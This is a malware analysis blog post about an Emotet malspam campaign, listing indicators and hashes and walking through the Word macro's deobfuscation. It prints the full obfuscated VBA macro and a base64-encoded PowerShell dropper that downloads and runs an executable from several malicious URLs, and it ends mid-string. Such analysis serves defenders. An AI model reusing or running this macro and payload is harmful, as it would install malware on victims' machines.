2017-08-28 Malspam Leads To Emotet Malware

For today’s post, I am walking through an Emotet malspam that we received this past Friday that contained a simple link that lead to a macro enabled Word document. Googling around I see that @dvk01uk came across the same URLs 5 days ago. You can read that post here. Running the maldoc in my test VM showed that the initial link was still working and downloaded an executable. When running that executable on my test VM, I saw a couple of POST requests going to dead sites. First I will walk through the script that I deobfuscated and then the traffic coming from the maldoc.

For more information about Emotet, see this article from SC Magazine. The sample that I discuss here does not seem to be using any worm like propagation techniques as described from the team at Fidelis.

Note: It was a bank holiday weekend this weekend so this post was written when I could find some free time. So the artifacts gathered may reflect different days/times. 😎

For all the PCAPs and artifacts from this investigation, please see my repo located here.

IOCs:
=====
wernerbernheim[.]com[.]uy / 179.27.153.45 (HTTP GET)
vereb[.]com
hocompro[.]com
okiembociana[.]pl
qdecisions.com
62[.]39.95[.]185 (TCP:443 POST)
104[.]236.252[.]178 (TCP:8080 POST)

Artifacts:
==========
File name: Invoice # 9674991 Problem.doc
File size: 78KB
File Path: NA
MD5 hash: 34cd3e23fdc582c1f70670e356ae877a
Virustotal: https://virustotal.com/#/file/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc/community
First Submission: 2017-08-23 06:49:36
Detection ratio: 31 / 59
Malwr: https://malwr.com/analysis/Mjk5NTJiMWQxMGQ4NGFiYWE1M2YyZTA5MDNkY2MxMmU/
Hybrid Analysis: https://www.reverse.it/sample/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc?environmentId=100

File name: GVhZFRnuDfWvPO.exe
File size: 84KB
File Path: C:\Users\%username%\AppData\Local\Temp
MD5 hash: 156727ee7cfa8bb40f8b43bc45c7ffba
Virustotal: https://virustotal.com/#/file/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571/detection
First Submission: 2017-08-23 21:24:37
Detection ratio: 42 / 65
Malwr: NA
Hybrid Analysis: https://www.reverse.it/sample/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100

File name: serviceprov.exe
File size: 84KB
File Path: C:\Users\%username%\AppData\Local\Microsoft\Windows
MD5 hash: 156727ee7cfa8bb40f8b43bc45c7ffba
Virustotal: https://virustotal.com/#/file/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571/detection
First Submission: 2017-08-23 21:24:37
Detection ratio: 42 / 65
Malwr: NA
Hybrid Analysis: https://www.reverse.it/sample/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100

Walk Through of Script:
=======================
So there are a couple of ways to go about getting access to the deobfuscated script. You can use tools like Olevba.py from Decalage or oledump-py from Didier Stevens, or my favorite OfficeMalScanner. This walk through will focus on the use of OfficeMalScanner.

Using OfficeMalScanner and the “info” option as seen in the image below, it pulled out two files that contained the malicious script (both are the same by the way).

The following is the original script.

Attribute VB_Name = "Module1"

Function tBXRpcutKGy()
Dim aUyMWUfX()
xhkWNCwR = 7772
ReDim aUyMWUfX(7772)
aUyMWUfX(5756) = YrpPPTVkfY
 aUyMWUfX(3925) = bRtPBPVLz
 aUyMWUfX(6618) = 9766
 aUyMWUfX(1268) = 3639
 For xhkWNCwR = 195 To 4834
aUyMWUfX(xhkWNCwR) = xhkWNCwR
Next
End Function
 
Function bNZHkXXn()
Dim fgwcWMHGyB()
tDkCGBrV = 7093
ReDim fgwcWMHGyB(7093)
fgwcWMHGyB(3791) = vPaDUCnZ
 fgwcWMHGyB(5504) = SFmtwbbMGNK
 fgwcWMHGyB(1812) = cWEcUyXdZNE
 fgwcWMHGyB(2665) = PWUYyzCcKws
 fgwcWMHGyB(5997) = 3789
 fgwcWMHGyB(6096) = 7664
 fgwcWMHGyB(6787) = 9833
 fgwcWMHGyB(5173) = 2568
 fgwcWMHGyB(4031) = 8692
 fgwcWMHGyB(1650) = 1540
 For tDkCGBrV = 5297 To 3064
fgwcWMHGyB(tDkCGBrV) = tDkCGBrV
Next
End Function
 
Function rvKVpBYcu()
Dim tfzRDTrcM()
KSkCSdHXAED = 6811
ReDim tfzRDTrcM(6811)
tfzRDTrcM(2322) = AtztbeErwa
 tfzRDTrcM(4292) = BWmDATcRZ
 tfzRDTrcM(6219) = SrkHKEnV
 tfzRDTrcM(1691) = GNsYckBaA
 tfzRDTrcM(1553) = vdWwxkbEfaE
 tfzRDTrcM(6398) = 1299
 tfzRDTrcM(4502) = 452
 tfzRDTrcM(3842) = 2596
 tfzRDTrcM(4721) = 6226
 For KSkCSdHXAED = 3469 To 302
tfzRDTrcM(KSkCSdHXAED) = KSkCSdHXAED
Next
End Function
 
Function uTHgFyyV()
Dim hHHLDTgS()
vFEENKuL = 6335
ReDim hHHLDTgS(6335)
hHHLDTgS(4533) = AxczdFwCbpa
 hHHLDTgS(3443) = DLkLaUttwk
 hHHLDTgS(2456) = 1483
 hHHLDTgS(889) = 7409
 hHHLDTgS(232) = 6145
 For vFEENKuL = 6324 To 1071
hHHLDTgS(vFEENKuL) = vFEENKuL
Next
End Function
 
Function zyRhMZtEF()
Dim fTnNwrrLgAF()
svuKLgcmw = 4953
ReDim fTnNwrrLgAF(4953)
fTnNwrrLgAF(4597) = cBheKFWLWgx
 fTnNwrrLgAF(2506) = XXXdnEykpYH
 fTnNwrrLgAF(4417) = wgHZUYBb
 fTnNwrrLgAF(4436) = VuUMkDrCwv
 fTnNwrrLgAF(2230) = 3094
 fTnNwrrLgAF(4629) = 8894
 fTnNwrrLgAF(1882) = 6101
 fTnNwrrLgAF(1650) = 226
 fTnNwrrLgAF(1301) = 9588
 fTnNwrrLgAF(3423) = 882
 For svuKLgcmw = 1730 To 2054
fTnNwrrLgAF(svuKLgcmw) = svuKLgcmw
Next
End Function
 
Function kVfxxgeZTcx()
Dim cNhmaTXxm()
BmnMsurwx = 8738
ReDim cNhmaTXxm(8738)
cNhmaTXxm(2107) = rYpHhaXM
 cNhmaTXxm(4239) = ssbeCguByfD
 cNhmaTXxm(6984) = TyDznyPyeks
 cNhmaTXxm(8257) = 312
 cNhmaTXxm(133) = 6779
 cNhmaTXxm(3494) = 6258
 For BmnMsurwx = 5098 To 1531
cNhmaTXxm(BmnMsurwx) = BmnMsurwx
Next
End Function
 
Function zxDDnHtE()
Dim xxAHkeRpfGX()
BGLnTuFBWd = 2487
ReDim xxAHkeRpfGX(2487)
xxAHkeRpfGX(1258) = FusggnCkM
 xxAHkeRpfGX(298) = vPtBDYEkrT
 xxAHkeRpfGX(1863) = pgYZFanEX
 xxAHkeRpfGX(1971) = TVrCVXdFsrN
 xxAHkeRpfGX(332) = tAcsBWNwS
 xxAHkeRpfGX(1618) = MzUGSBNYN
 xxAHkeRpfGX(789) = 7981
 xxAHkeRpfGX(2421) = 7966
 xxAHkeRpfGX(138) = 4484
 xxAHkeRpfGX(2163) = 9150
 xxAHkeRpfGX(1103) = 1880
 For BGLnTuFBWd = 438 To 2203
xxAHkeRpfGX(BGLnTuFBWd) = BGLnTuFBWd
Next
End Function
 
Function fvUmWakZZYK()
Dim TSWvdtKMh()
vwPpbCTn = 7944
ReDim TSWvdtKMh(7944)
TSWvdtKMh(7122) = tgNRdsMwt
 TSWvdtKMh(3881) = brbXLzLWtH
 TSWvdtKMh(2436) = muXZpUfPGaL
 TSWvdtKMh(4599) = mCxafFNNa
 TSWvdtKMh(1118) = 3467
 TSWvdtKMh(2552) = 6452
 TSWvdtKMh(7686) = 6721
 For vwPpbCTn = 7878 To 7420
TSWvdtKMh(vwPpbCTn) = vwPpbCTn
Next
End Function
 
Function CgAdLyezp()
Dim PfDSCfau()
eHBADPnM = 5319
ReDim PfDSCfau(5319)
PfDSCfau(4753) = VXsMybXeaA
 PfDSCfau(3102) = CNKLPEdUfm
 PfDSCfau(1100) = LHcTEumpTTm
 PfDSCfau(2463) = xaBCaVhG
 PfDSCfau(2793) = 7975
 PfDSCfau(4802) = 5773
 PfDSCfau(2858) = 6001
 PfDSCfau(4300) = 7075
 PfDSCfau(4664) = 8911
 For eHBADPnM = 2922 To 4875
PfDSCfau(eHBADPnM) = eHBADPnM
Next
End Function
 
Function wvFMSCtgSB()
Dim UDYkpKHVvc()
mmGwMYbWa = 3559
ReDim UDYkpKHVvc(3559)
UDYkpKHVvc(2024) = btKHhNusS
 UDYkpKHVvc(2015) = uSRnWNHzvW
 UDYkpKHVvc(1996) = LnDZbkwhpEY
 UDYkpKHVvc(156) = 6808
 UDYkpKHVvc(1741) = 3548
 UDYkpKHVvc(1625) = 4118
 For mmGwMYbWa = 1128 To 3240
UDYkpKHVvc(mmGwMYbWa) = mmGwMYbWa
Next
End Function
 
Function DKWTEVRRMBN()
Dim cXszFrzwURz()
cyLYRTKSSdC = 7004
ReDim cXszFrzwURz(7004)
cXszFrzwURz(3595) = gtyrxgwS
 cXszFrzwURz(2615) = PzfKEZMsBW
 cXszFrzwURz(5245) = BNZkwMNR
 cXszFrzwURz(4066) = WRscespGr
 cXszFrzwURz(3282) = FHMwanSUR
 cXszFrzwURz(6547) = 2845
 cXszFrzwURz(6240) = 4262
 cXszFrzwURz(4314) = 5615
 cXszFrzwURz(4342) = 3162
 For cyLYRTKSSdC = 3463 To 1101
cXszFrzwURz(cyLYRTKSSdC) = cyLYRTKSSdC
Next
End Function

Sub autoopen()
	GnLpEPBGuvx
End Sub

Public Function ugCunPaK(sTzHXsUeNU)
	ugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + SNnkzEnw
End Function

Public Function dZmAMvagz()
nXywrxED = "KMEtckFDb"
 vXhCxGNDf = "MSryEeLx"
 fUpMfRAmTtm = "PDZKSskkZW"
 nHLDemZX = "MGRCSwyH"
 ZFHHcWys = "hbUxpPAm"
 RuUFXAPLH = "fLuFrCSY"
 DFBrGCMHmkE = "SFbeZuebNsh"
 fbtDPfDett = ugCunPaK("LfRkbnymP") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + ugCunPaK("KaGzyXtDkNm") + ugCunPaK("NfKBcxXvzGh") + ugCunPaK("BDwuRPNPN")
BNVewnkk = "UrpABZmTnr"
 naakDWndM = "yKZfYFAYKfy"

amRFZWXULCs = ugCunPaK("kgvXgFbt") + ugCunPaK("gTmRgTPkG") + ugCunPaK("VNbtSPzwZ") + ugCunPaK("UmCYHMCwU") + ugCunPaK("nmPWNzEc")
SekyzxBsr = amRFZWXULCs + fbtDPfDett
aRSdcDurYRy = "AswGHnGuMza"
 dZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function

Public Function uMvWKNsFzRd()
	uMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + KchPUyEn
End Function

Public Function GnLpEPBGuvx()
	CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + LHxhzkDv, 0
End Function

Function KWgbkykHZP()
Dim RfxRMkmmzZ()
apHNVUBpU = 7904
ReDim RfxRMkmmzZ(7904)
RfxRMkmmzZ(1286) = xXcDTbkGSW
 RfxRMkmmzZ(2064) = EMsevfdYYka
 RfxRMkmmzZ(5661) = EMwVBBWVW
 RfxRMkmmzZ(1307) = UBXmtnHhnTE
 RfxRMkmmzZ(1470) = TXfbKEVeKC
 RfxRMkmmzZ(73) = 5450
 RfxRMkmmzZ(965) = 9043
 RfxRMkmmzZ(229) = 4176
 RfxRMkmmzZ(274) = 7658
 RfxRMkmmzZ(6802) = 9707
 For apHNVUBpU = 6746 To 204
RfxRMkmmzZ(apHNVUBpU) = apHNVUBpU
Next
End Function
 
Function KRLsRUxSsUC()
Dim VxVayeNKuY()
kxcsPUvhp = 9719
ReDim VxVayeNKuY(9719)
VxVayeNKuY(5743) = XrTSuwmVh
 VxVayeNKuY(2356) = wMrdhDPCbE
 VxVayeNKuY(9379) = AGvwbVmarcD
 VxVayeNKuY(7940) = 8601
 VxVayeNKuY(8579) = 5842
 VxVayeNKuY(6218) = 4932
 VxVayeNKuY(7419) = 7205
 VxVayeNKuY(4097) = 3279
 For kxcsPUvhp = 1802 To 5262
VxVayeNKuY(kxcsPUvhp) = kxcsPUvhp
Next
End Function
 
Function rspLFEBgVZ()
Dim CwwVvdVSvHE()
VSSWyeEK = 4631
ReDim CwwVvdVSvHE(4631)
CwwVvdVSvHE(2943) = KnLswFvuSNH
 CwwVvdVSvHE(1407) = rXAPeuFkeE
 CwwVvdVSvHE(2405) = rZfSvkrkUs
 CwwVvdVSvHE(4079) = EYeXZuXzV
 CwwVvdVSvHE(808) = 4846
 CwwVvdVSvHE(2419) = 6206
 For VSSWyeEK = 1315 To 2061
CwwVvdVSvHE(VSSWyeEK) = VSSWyeEK
Next
End Function
 
Function KuCFZsbGvfm()
Dim RuxuvpKcyh()
FMCSSBse = 2712
ReDim RuxuvpKcyh(2712)
RuxuvpKcyh(2072) = uHuEphMy
 RuxuvpKcyh(2457) = NgyfMkumRn
 RuxuvpKcyh(1760) = xfzSnfCFENf
 RuxuvpKcyh(703) = rehrZhEW
 RuxuvpKcyh(655) = 8514
 RuxuvpKcyh(1385) = 6813
 For FMCSSBse = 528 To 1670
RuxuvpKcyh(FMCSSBse) = FMCSSBse
Next
End Function
 
Function FFMwgaYM()
Dim FBdFYFybY()
fDvNBaxmpMw = 2610
ReDim FBdFYFybY(2610)
FBdFYFybY(1373) = PCkLDZhMgc
 FBdFYFybY(865) = PehxeTTXude
 FBdFYFybY(2007) = 6045
 FBdFYFybY(1892) = 1724
 FBdFYFybY(96) = 73
 FBdFYFybY(2261) = 4950
 FBdFYFybY(1865) = 902
 For fDvNBaxmpMw = 2409 To 2155
FBdFYFybY(fDvNBaxmpMw) = fDvNBaxmpMw
Next
End Function
 
Function emrKSCdBkA()
Dim EPrzzbNhTDw()
YCcSTMZV = 4386
ReDim EPrzzbNhTDw(4386)
EPrzzbNhTDw(3407) = LYxmCkPnB
 EPrzzbNhTDw(4277) = sbHVZmyS
 EPrzzbNhTDw(713) = tehkErHMZ
 EPrzzbNhTDw(1392) = bKpbxcVgck
 EPrzzbNhTDw(3363) = 5378
 EPrzzbNhTDw(2300) = 8663
 EPrzzbNhTDw(1330) = 764
 EPrzzbNhTDw(2300) = 2578
 EPrzzbNhTDw(2226) = 1081
 EPrzzbNhTDw(2022) = 3830
 For YCcSTMZV = 2370 To 1408
EPrzzbNhTDw(YCcSTMZV) = YCcSTMZV
Next
End Function
 
Function UGHFGXMDmY()
Dim ptvYBrECdr()
TUcEUXCkuK = 9074
ReDim ptvYBrECdr(9074)
ptvYBrECdr(8210) = HDKVGwRavL
 ptvYBrECdr(8972) = gkALasxL
 ptvYBrECdr(8712) = hActVXbu
 ptvYBrECdr(6182) = vcMkyVUtD
 ptvYBrECdr(1196) = EfhGUuVXbdV
 ptvYBrECdr(8154) = hyyxpMgkBT
 ptvYBrECdr(6025) = 629
 ptvYBrECdr(8192) = 190
 ptvYBrECdr(6255) = 8494
 For TUcEUXCkuK = 2971 To 8016
ptvYBrECdr(TUcEUXCkuK) = TUcEUXCkuK
Next
End Function
 
Function vsReyNEk()
Dim FGNPxDgR()
dNppxZwPpcb = 4284
ReDim FGNPxDgR(4284)
FGNPxDgR(357) = nLSUvpBn
 FGNPxDgR(2296) = GmHrPzWe
 FGNPxDgR(2084) = yBpTvyTCAX
 FGNPxDgR(3032) = kFXYfefe
 FGNPxDgR(3090) = 700
 FGNPxDgR(2415) = 7683
 FGNPxDgR(3723) = 1696
 For dNppxZwPpcb = 3075 To 3180
FGNPxDgR(dNppxZwPpcb) = dNppxZwPpcb
Next
End Function
 
Function pCHhXMbL()
Dim gTbYDYvnCFK()
kSrFLzhF = 6984
ReDim gTbYDYvnCFK(6984)
gTbYDYvnCFK(1465) = MfhnzDds
 gTbYDYvnCFK(1976) = NWtAppGka
 gTbYDYvnCFK(3497) = UuXfxzyYkt
 gTbYDYvnCFK(5413) = XPmZdgwFmB
 gTbYDYvnCFK(5110) = wxwhYeCeBN
 gTbYDYvnCFK(2916) = 4252
 gTbYDYvnCFK(5255) = 813
 gTbYDYvnCFK(222) = 4637
 gTbYDYvnCFK(1608) = 5961
 gTbYDYvnCFK(4251) = 6310
 gTbYDYvnCFK(2972) = 6903
 For kSrFLzhF = 3058 To 574
gTbYDYvnCFK(kSrFLzhF) = kSrFLzhF
Next
End Function
 
Function WhBTkeGK()
Dim YFxKLWsAfp()
wzGAvURR = 2449
ReDim YFxKLWsAfp(2449)
YFxKLWsAfp(1730) = eYhtkWzXts
 YFxKLWsAfp(1916) = rWbMKXtXUt
 YFxKLWsAfp(503) = 7093
 YFxKLWsAfp(1507) = 9360
 For wzGAvURR = 1171 To 1136
YFxKLWsAfp(wzGAvURR) = wzGAvURR
Next
End Function
 
Function SZcFhkaBYck()
Dim xwwxcbkkpw()
pSmPsyteH = 692
ReDim xwwxcbkkpw(692)
xwwxcbkkpw(339) = KxUbDzCKvv
 xwwxcbkkpw(192) = UuLeTrtn
 xwwxcbkkpw(199) = WSmyTyrgDpm
 xwwxcbkkpw(307) = vrVhCxnBFmu
 xwwxcbkkpw(511) = yMpmVNbxxZZ
 xwwxcbkkpw(270) = 3133
 xwwxcbkkpw(489) = 667
 xwwxcbkkpw(566) = 887
 xwwxcbkkpw(209) = 9747
 For pSmPsyteH = 314 To 461
xwwxcbkkpw(pSmPsyteH) = pSmPsyteH
Next
End Function

One of the things that I have learned while trying (emphasis on trying) to deobfuscate scripts and learning this art is that one should just glance through the script to see if anything stands out (keywords, URLs, paths, etc…). With this script, the first thing that stood out was the sub autoopen procedure, and then the middle section since it contained things like “ActiveDocument.CustomDocumentProperties” and “ActiveDocument.BuiltInDocumentProperties(“Comments”).” Doing a quick double click in Sublime Text with some of the other function names showed that nothing was calling them and was added to script to confuse the analyst. Below is the cleaned up script.

Sub autoopen()
	GnLpEPBGuvx
End Sub

Public Function GnLpEPBGuvx()
	CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz, 0
End Function

Public Function dZmAMvagz()
	fbtDPfDett = ugCunPaK("LfRkbnymP") + ugCunPaK("KaGzyXtDkNm") + ugCunPaK("NfKBcxXvzGh") + ugCunPaK("BDwuRPNPN")
	amRFZWXULCs = ugCunPaK("kgvXgFbt") + ugCunPaK("gTmRgTPkG") + ugCunPaK("VNbtSPzwZ") + ugCunPaK("UmCYHMCwU") + ugCunPaK("nmPWNzEc")
	SekyzxBsr = amRFZWXULCs + fbtDPfDett
	dZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function

Public Function ugCunPaK(sTzHXsUeNU)
	ugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) 
End Function

Public Function uMvWKNsFzRd()
	uMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy")
End Function

One thing to note with this script is that it is calling data held in the Word document itself via “ActiveDocument.CustomDocumentProperties” and “ActiveDocument.BuiltInDocumentProperties(“Comments”).” When you look at the Word document via it’s properties, there is a new tab called “Custom” with the following data:

When you look at the “Details” tab, there is a section within there called “Comments” with the following long string:

JAB7AHcAYABzAEMAUgBgAEkAUABUAH0AIAA9ACAALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAbwBiAGoAZQBjACcALAAnAG4AZQB3AC0AJwAsACcAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsANAB9AHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACcAcgBpAHAAJwAsACcAUwBoAGUAbABsACcALAAnAC4AJwAsACcAdAAnACwAJwBXAFMAYwAnACkAOwAkAHsAVwBFAEIAYwBgAGwAaQBFAGAATgBUAH0AIAA9ACAALgAoACIAewAzAH0AewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAGoAZQAnACwAJwBjAHQAJwAsACcAZQB3AC0AbwBiACcALAAnAG4AJwApACAAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9ACIAIAAtAGYAIAAnAHQAJwAsACcAdAAnACwAJwAuAE4AZQAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAbABpAGUAbgAnACkAOwAkAHsAUgBBAG4AYABkAGAATwBtAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBuAGUAJwAsACcALQBvAGIAagBlAGMAdAAnACwAJwB3ACcAKQAgACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAbwAnACwAJwByAGEAbgBkACcALAAnAG0AJwApADsAJAB7AHUAYABSAEwAUwB9ACAAPQAgACgAIgB7ADAAfQB7ADEANwB9AHsAMgAwAH0AewAzADAAfQB7ADIAOAB9AHsAMgA5AH0AewAzAH0AewAxADEAfQB7ADEANQB9AHsAMgAzAH0AewAyADEAfQB7ADIANQB9AHsAMQA2AH0AewAyAH0AewA3AH0AewAxADMAfQB7ADEAMgB9AHsAMgA3AH0AewAxADAAfQB7ADQAfQB7ADEAOQB9AHsAMQB9AHsAMgA0AH0AewA1AH0AewA5AH0AewAxADgAfQB7ADEANAB9AHsANgB9AHsAMgA2AH0AewAyADIAfQB7ADgAfQAiACAALQBmACAAJwBoACcALAAnAG0ALwBKAGwAVAAnACwAJwByAGUAYgAuAGMAbwBtAC8AUwBPACcALAAnAHkAJwAsACcAaABvAGMAbwBtAHAAcgBvAC4AYwAnACwAJwB0AHAAOgAvAC8AbwBrAGkAZQAnACwAJwBoAEMAZwBHAE8ALwAsAGgAdAB0AHAAOgAvAC8AcQBkAGUAYwBpAHMAaQBvAG4AcwAuAGMAbwBtACcALAAnAGcAaABWAFMALwAsACcALAAnAHoALwAnACwAJwBtAGIAbwBjAGkAJwAsACcALwAvACcALAAnAC8AYwBhAHAAYQBjAGkAdABhAGMAaQAnACwAJwB0ACcALAAnAGgAJwAsACcAbgBhAC4AcABsAC8AaQAnACwAJwBvAG4ALwBiACcALAAnAGUAJwAsACcAdAB0AHAAOgAvAC8AdwBlACcALAAnAGEAJwAsACcAbwAnACwAJwByAG4AZQAnACwAJwBMAFQAJwAsACcATAByAHcAagAnACwAJwBNACcALAAnAHMAegBXAC8ALABoAHQAJwAsACcAQgByAGMASQBFAC8ALABoAHQAdABwADoALwAvAHYAJwAsACcALwAnACwAJwB0AHAAOgAnACwAJwBlAGkAbQAuAGMAJwAsACcAbwBtAC4AdQAnACwAJwByAGIAZQByAG4AaAAnACkALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBTAHAAbABpACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnACwAJwApADsAJAB7AG4AYQBgAE0AZQB9ACAAPQAgACQAewBSAEEATgBEAGAATwBtAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAeAB0ACcALAAnAG4AZQAnACkALgBJAG4AdgBvAGsAZQAoADEALAAgADYANQA1ADMANgApADsAJAB7AFAAYQBgAFQASAB9ACAAPQAgACQAewBlAGAATgB2ADoAdABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBuAEEAYABtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAcgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAEMAbABpAEUAYABOAHQAfQAuACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBsACcALAAnAEYAaQBsAGUAJwAsACcARABvAHcAbgAnACwAJwBvAGEAZAAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBUACcALAAnAG8AUwB0AHIAaQBuAGcAJwApAC4ASQBuAHYAbwBrAGUAKAApACwAIAAkAHsAcABBAGAAVABIAH0AKQA7AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUwB0AGEAcgB0AC0AUAByACcALAAnAG8AYwBlACcALAAnAHMAcwAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwB3AHIAaQB0AGUALQBoACcALAAnAHMAdAAnACwAJwBvACcAKQAgACQAewBfAH0ALgAiAEUAeABjAEUAUAB0AGAAaQBgAE8AbgAiAC4AIgBtAEUAcwBTAGAAQQBHAGUAIgA7AH0AfQANAAoA

Interestingly enough, if you open the Word document and go back to the properties of the file, the “Custom” tab and the data within “Comments” field are gone. If you close out the Word doc, they come back. So the script above is using these bits embedded into the Word file itself for something. We will get to that in a moment.

So when looking at this macro, like any macro enabled Word document, I started off looking at the sub procedure called autoopen which calls the function ‘GnLpEPBGuvx’. This function creates an object as seen via ‘CreateObject’ while also calling the ‘uMvWKNsFzRd’, ‘ugCunPaK’, and ‘dZmAMvagz’ functions.

Throughout the script, there are calls to the function ‘ugCunPaK’ which also passes a parameter (sTzHXsUeNU). All this function is doing is taking what is passed to it and saying to look for it in the “Comments” tab in the Word file. For example when working through this line of the script:

CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz

The “uMvWKNsFzRd” function is being called which runs this line of code:

uMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy")

The code then calls the “ugCunPaK” function and passes “FEdDZxrN,” “eZumagfGLaB,” and “tAxtxcsvzy” as parameters. When the “ugCunPaK” function is called, it looks up the values “FEdDZxrN,” “eZumagfGLaB,” and “tAxtxcsvzy” in the comments of the Word file which translates to ‘Wscript.’. It then passes back to the GnLpEPBGuvx function and proceeds to do the same thing again just using “hafbyEHH,” and “gsbuMzRpUVs” as the parameters that get passed.

After several times of doing this throughout the script, we get the following cleaned up script:

Sub autoopen()
	GnLpEPBGuvx
End Sub

Public Function GnLpEPBGuvx()
	CreateObject(Wscript. ugCunPaK("SH") + ugCunPaK("ell")).Run$ dZmAMvagz
End Function

Public Function dZmAMvagz()
	fbtDPfDett = ugCunPaK("l") + ugCunPaK("-") + ugCunPaK("e") + ugCunPaK(" ")
	amRFZWXULCs = ugCunPaK("p") + ugCunPaK("o") + ugCunPaK("we") + ugCunPaK("rsh") + ugCunPaK("el")
	SekyzxBsr = powershel + l-e 
	dZmAMvagz = powershell-e  + JAB7AHcAYABzAEMAUgBgAEkAUABUAH0AIAA9ACAALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAbwBiAGoAZQBjACcALAAnAG4AZQB3AC0AJwAsACcAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsANAB9AHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACcAcgBpAHAAJwAsACcAUwBoAGUAbABsACcALAAnAC4AJwAsACcAdAAnACwAJwBXAFMAYwAnACkAOwAkAHsAVwBFAEIAYwBgAGwAaQBFAGAATgBUAH0AIAA9ACAALgAoACIAewAzAH0AewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAGoAZQAnACwAJwBjAHQAJwAsACcAZQB3AC0AbwBiACcALAAnAG4AJwApACAAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9ACIAIAAtAGYAIAAnAHQAJwAsACcAdAAnACwAJwAuAE4AZQAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAbABpAGUAbgAnACkAOwAkAHsAUgBBAG4AYABkAGAATwBtAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBuAGUAJwAsACcALQBvAGIAagBlAGMAdAAnACwAJwB3ACcAKQAgACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAbwAnACwAJwByAGEAbgBkACcALAAnAG0AJwApADsAJAB7AHUAYABSAEwAUwB9ACAAPQAgACgAIgB7ADAAfQB7ADEANwB9AHsAMgAwAH0AewAzADAAfQB7ADIAOAB9AHsAMgA5AH0AewAzAH0AewAxADEAfQB7ADEANQB9AHsAMgAzAH0AewAyADEAfQB7ADIANQB9AHsAMQA2AH0AewAyAH0AewA3AH0AewAxADMAfQB7ADEAMgB9AHsAMgA3AH0AewAxADAAfQB7ADQAfQB7ADEAOQB9AHsAMQB9AHsAMgA0AH0AewA1AH0AewA5AH0AewAxADgAfQB7ADEANAB9AHsANgB9AHsAMgA2AH0AewAyADIAfQB7ADgAfQAiACAALQBmACAAJwBoACcALAAnA